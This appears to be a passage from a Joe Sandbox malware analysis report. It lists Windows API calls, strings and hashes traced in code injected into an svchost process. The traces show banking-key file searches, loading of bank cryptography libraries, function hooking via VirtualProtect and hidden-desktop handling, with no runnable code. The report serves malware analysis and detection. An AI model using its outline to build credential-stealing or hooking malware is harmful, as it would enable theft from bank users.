                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbba8f8f4dfc7647160e93b1fc450247ae37353af0cbececea694a39a7fb0223
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0A200B4A91218BEFB209B94DC4AFEE7778AF49B04F508544F601BA2C0D7F46A448B65
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3D080
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3D09D
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,75B07390,?), ref: 02D3D0AD
                                                                                                                                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D3D0BC
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,75B07390,?), ref: 02D3D0D3
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?,?,?,?,?,75B07390,?), ref: 02D3D0EC
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,75B07390,?), ref: 02D3D122
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(header.key,?,?,?,?,75B07390,?), ref: 02D3D135
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC08D,?,?,?,?,75B07390,?), ref: 02D3D164
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,75B07390,?), ref: 02D3D1A4
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,75B07390,?), ref: 02D3D1AA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3D1B2
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3D1C1
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,75B07390,?), ref: 02D3D1C8
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,75B07390,?), ref: 02D3D1FE
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,75B07390,?), ref: 02D3D204
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D3D20C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3D21B
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,75B07390,?), ref: 02D3D222
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 02D3DAB0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$DirectoryModePath$AdminCreateDriveFolderMakeSystemUsermemset$AttributesBackslashCurrentFileLogicalStringsType
                                                                                                                                                                                                                • String ID: 5E8DC08D$\header.key$\masks.key$\masks2.key$\name.key$\primary.key$\primary2.key$header.key$keys99$keys99.zip$masks.key$masks2.key$name.key$path99.txt$primary.key$primary2.key
                                                                                                                                                                                                                • API String ID: 857499637-3982077908
                                                                                                                                                                                                                • Opcode ID: 36f801f30d4b240cfcf10fcb2018f3ae5037e9deb135cb51d0398e703923bd30
                                                                                                                                                                                                                • Instruction ID: 82d2c670ca82462d71f3b98a0f0192250e9982deaa1368ded65097cbecd2bea4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36f801f30d4b240cfcf10fcb2018f3ae5037e9deb135cb51d0398e703923bd30
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 286214319483468FC712DF34E46CAAA7BE6EF89700B588958E4C6C7311EB71DC59CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02D2BA57
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02D2BA62
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: GetComputerNameA.KERNEL32(02D6F588,?), ref: 02D2D7B7
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: lstrlenA.KERNEL32(02D6F588,?,?,?,02D3714F), ref: 02D2D7C2
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D802
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D812
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D822
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D82F
                                                                                                                                                                                                                  • Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D83C
                                                                                                                                                                                                                • RegisterWindowMessageA.USER32(a1633b6ba), ref: 02D2BA77
                                                                                                                                                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,02D6F5A0), ref: 02D2BAA0
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,02D6F670), ref: 02D2BAB3
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,02D6F630), ref: 02D2BACA
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D2BAE6
                                                                                                                                                                                                                • Sleep.KERNEL32(000000C8), ref: 02D2BAF6
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D2BAFE
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D2BB17
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02D2BB1E
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D2BB34
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2BB60
                                                                                                                                                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,02D6F54C), ref: 02D2BB6E
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D2BB81
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D2BBB8
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02D2BBCC
                                                                                                                                                                                                                • Sleep.KERNEL32(000000C8), ref: 02D2BBD7
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2BBE4
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2BBEF
                                                                                                                                                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,02D6F54C), ref: 02D2BBFD
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D2BC10
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2BC25
                                                                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,02D6F5DC), ref: 02D2BC33
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D2BC3E
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D2BC52
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefWindowProcW), ref: 02D2BC8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefWindowProcA), ref: 02D2BCAC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefDlgProcW), ref: 02D2BCCC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefDlgProcA), ref: 02D2BCEC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefFrameProcW), ref: 02D2BD0C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefFrameProcA), ref: 02D2BD2C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefMDIChildProcW), ref: 02D2BD4C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DefMDIChildProcA), ref: 02D2BD6C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CallWindowProcW), ref: 02D2BD8C
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: memcpy.MSVCRT ref: 02D3A0A0
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CallWindowProcA), ref: 02D2BDAC
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000), ref: 02D3A17A
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A186
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: GetCurrentProcess.KERNEL32(00000000,00000000,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A197
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: FlushInstructionCache.KERNEL32(00000000,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A19E
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 02D2BDCC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterClassA), ref: 02D2BDEC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterClassExA), ref: 02D2BE0C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterClassExW), ref: 02D2BE2C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PeekMessageW), ref: 02D2BE4C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PeekMessageA), ref: 02D2BE6C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 02D2BE8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 02D2BEAC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenDesktopW), ref: 02D2BECC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SwitchDesktop), ref: 02D2BEEC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBeep), ref: 02D2BF0C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 02D2BF2C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCursorPos), ref: 02D2BF4C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetCursorPos), ref: 02D2BF6C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessagePos), ref: 02D2BF8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetCapture), ref: 02D2BFAC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseCapture), ref: 02D2BFCC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCapture), ref: 02D2BFEC
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Winmm.dll,00000000,00000000,00000000,02D2B880,02D6EB4C), ref: 02D2C013
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PlaySoundW), ref: 02D2C025
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 02D2C045
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,sndPlaySoundW), ref: 02D2C065
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,sndPlaySoundA), ref: 02D2C085
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Kernel32.dll,00000000,00000000,00000000,02D2B470,02D6EB64), ref: 02D2C0A4
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Beep), ref: 02D2C0B0
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Gdi32.dll,00000000,00000000,00000000,02D2B4B0,02D6EB78), ref: 02D2C0CF
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDIBitsToDevice), ref: 02D2C0DB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$FileOpen$Virtualwsprintf$LibraryLoadMutexProtect$CurrentMappingObjectView$HandleInformationProcessReleaseSingleSleepThreadWait$AllocCacheCloseComputerCountCreateDesktopEventFlushHeapInstructionMessageNameRegisterTickUserWindowlstrcmpilstrlenmemcpy
                                                                                                                                                                                                                • String ID: Beep$CallWindowProcA$CallWindowProcW$DefDlgProcA$DefDlgProcW$DefFrameProcA$DefFrameProcW$DefMDIChildProcA$DefMDIChildProcW$DefWindowProcA$DefWindowProcW$FlashWindowEx$Gdi32.dll$GetCapture$GetCursorPos$GetMessagePos$Kernel32.dll$MessageBeep$OpenDesktopA$OpenDesktopW$OpenInputDesktop$PeekMessageA$PeekMessageW$PlaySoundA$PlaySoundW$RegisterClassA$RegisterClassExA$RegisterClassExW$RegisterClassW$ReleaseCapture$SetCapture$SetCursorPos$SetDIBitsToDevice$SwitchDesktop$Winmm.dll$a1633b6ba$sndPlaySoundA$sndPlaySoundW$user32.dll
                                                                                                                                                                                                                • API String ID: 1664322764-1755510222
                                                                                                                                                                                                                • Opcode ID: 632d57109f4f4e815b92ca987a47fd4444e6093def5f82556c2c15585f987da0
                                                                                                                                                                                                                • Instruction ID: 297d7ec8a753f568ea058bd8f2864f74a0e3dfdb2b27498aa4d03dd9ed4e608f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632d57109f4f4e815b92ca987a47fd4444e6093def5f82556c2c15585f987da0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00D16374BC032776FA206A71AE5EF6A2B5C5B24E4CF240812B543B6345DEF8EC4D8974
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D35251
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF550,75B07390,74DF0A60), ref: 02D35267
                                                                                                                                                                                                                • AddVectoredExceptionHandler.KERNEL32(00000001,02D23AE0), ref: 02D35274
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D3528F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3A2B0,00000000,00000000,00000000), ref: 02D352A9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D352C1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D352D2
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02D6FB50), ref: 02D352E3
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D352F9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02D3530B
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D3532A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02D35338
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02D35354
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02D35370
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02D6FB38), ref: 02D3538B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02D35392
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02D353A2
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,02D27760,02D79E88), ref: 02D353B8
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D353D3
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D353E8
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02D353EF
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D35401
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D3541B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02D3542B
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,02D2B930,02D6EB74), ref: 02D35441
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D35450
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D35465
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02D3546C
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D3547E
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,java), ref: 02D354B2
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.exe), ref: 02D354C4
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02D354DA
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02D354F1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02D354FF
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02D3551B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02D35537
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02D6FB20), ref: 02D35552
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02D3557F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02D3558B
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02D355AA
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02D355B6
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02D355D5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02D355E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                                • String ID: .exe$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$a1633b6ba$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                                • API String ID: 1248150503-2947894363
                                                                                                                                                                                                                • Opcode ID: dbcf6159ca0bc7e6947b4c7db649f1a72330b7c394f951e923588bf01c3bfd29
                                                                                                                                                                                                                • Instruction ID: 41694e048695450f00fc5379cd06d6b9caace946e6ac85a7097ea2f80eeb0cd0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbcf6159ca0bc7e6947b4c7db649f1a72330b7c394f951e923588bf01c3bfd29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E917071BC03167AFA216BB1FC0EF6A27589B18B44F944510B542F6384DBE8ED48CA75
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 02D2D18F
                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02D2D19A
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D2D1AD
                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 02D2D1C2
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EB), ref: 02D2D1D1
                                                                                                                                                                                                                • SetWindowTextA.USER32(?,-00000008), ref: 02D2D1DD
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02D2D1EC
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D2D1F7
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D2D20A
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 02D2D248
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02D2D258
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2D267
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02D2D27F
                                                                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 02D2D289
                                                                                                                                                                                                                • CreateFontIndirectA.GDI32 ref: 02D2D29F
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02D2D2AF
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2D2E7
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2D2EA
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02D2D2FE
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 02D2D363
                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02D2D38D
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 02D2D399
                                                                                                                                                                                                                • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02D2D3B5
                                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02D2D3DA
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02D2D3EC
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000E6), ref: 02D2D3F5
                                                                                                                                                                                                                • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2D404
                                                                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 02D2D40B
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02D2D41F
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02D2D443
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02D2D450
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 02D2D460
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000DE), ref: 02D2D47C
                                                                                                                                                                                                                • GetClassLongA.USER32(00000000,000000F2), ref: 02D2D485
                                                                                                                                                                                                                • LoadIconA.USER32(00000000,00007F00), ref: 02D2D491
                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02D2D4AB
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02D2D4D4
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D2D4E3
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D2D4F6
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02D2D519
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 02D2D537
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000001), ref: 02D2D544
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2D553
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2D56B
                                                                                                                                                                                                                  • Part of subcall function 02D2D0E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2D0EC
                                                                                                                                                                                                                  • Part of subcall function 02D2D0E0: GetCurrentThreadId.KERNEL32 ref: 02D2D0F4
                                                                                                                                                                                                                  • Part of subcall function 02D2D0E0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02D2D100
                                                                                                                                                                                                                  • Part of subcall function 02D2D0E0: SendMessageA.USER32(?,0000000D,?,?), ref: 02D2D111
                                                                                                                                                                                                                  • Part of subcall function 02D2D0E0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02D2D11D
                                                                                                                                                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02D2D578
                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 02D2D5E7
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000), ref: 02D2D5EE
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2D5FE
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2D618
                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000000), ref: 02D2D62D
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EB), ref: 02D2D63C
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 02D2D648
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D2D657
                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 02D2D65E
                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 02D2D673
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                                • String ID: '$<$static
                                                                                                                                                                                                                • API String ID: 2592195760-1233416523
                                                                                                                                                                                                                • Opcode ID: 5fe902083bbb86ca7b571771a3e599c44a875f86cc9422d0e9b87d7e1021eb59
                                                                                                                                                                                                                • Instruction ID: 22c2663aa4536b03cba7db4ffd83fe99ea6b5a319c3a35aeca6e4b414b181652
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fe902083bbb86ca7b571771a3e599c44a875f86cc9422d0e9b87d7e1021eb59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28E1B072984210AFD3208F68FC8CF6A37A9EB99726F504A08F555E63C0D774AC95CB71
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D44B30: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 02D44B60
